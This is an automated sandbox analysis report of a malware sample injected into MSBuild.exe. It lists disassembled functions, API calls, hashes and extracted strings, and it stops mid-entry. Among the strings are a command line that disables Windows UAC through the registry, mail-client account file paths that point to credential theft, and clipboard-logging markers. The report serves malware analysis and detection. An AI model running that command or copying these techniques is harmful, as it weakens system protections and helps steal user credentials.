                                                                                                                                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                            Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                                            • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                                            Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                            • _free.LIBCMT ref: 10005B2D
                                                                                                                                            • _free.LIBCMT ref: 10005B55
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                            • _abort.LIBCMT ref: 10005B74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                            • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                            • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                            • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                            • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                            Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                            • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                            • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                                            • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                            • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                                            Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                            • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                                            • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                                            • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                                            • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                                            Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                            • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                                            • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                                            • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                                            • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                                            Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                            • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                                            • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                                            • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                                            • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                                            Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                                                            • String ID: [regsplt]$DG
                                                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                                                            • Opcode ID: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
                                                                                                                                            • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                                            • Opcode Fuzzy Hash: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
                                                                                                                                            • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                            Function 0044D459 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                                                            • _free.LIBCMT ref: 0044D5C5
                                                                                                                                              • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                                                              • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                                                                              • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                            • String ID: *?$.$u;~/
                                                                                                                                            • API String ID: 2812119850-2875973209
                                                                                                                                            • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                                                            • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                                                            • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                                                            • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                                                            Function 004426D4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$x7
                                                                                                                                            • API String ID: 2506810119-656177465
                                                                                                                                            • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                            • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                            Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                            • API String ID: 4036392271-1520055953
                                                                                                                                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                            Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                                            • API String ID: 2974294136-753205382
                                                                                                                                            • Opcode ID: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                                            • Opcode Fuzzy Hash: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                                            Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                                            Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                            Strings
                                                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                                            Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                            Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                                            Strings
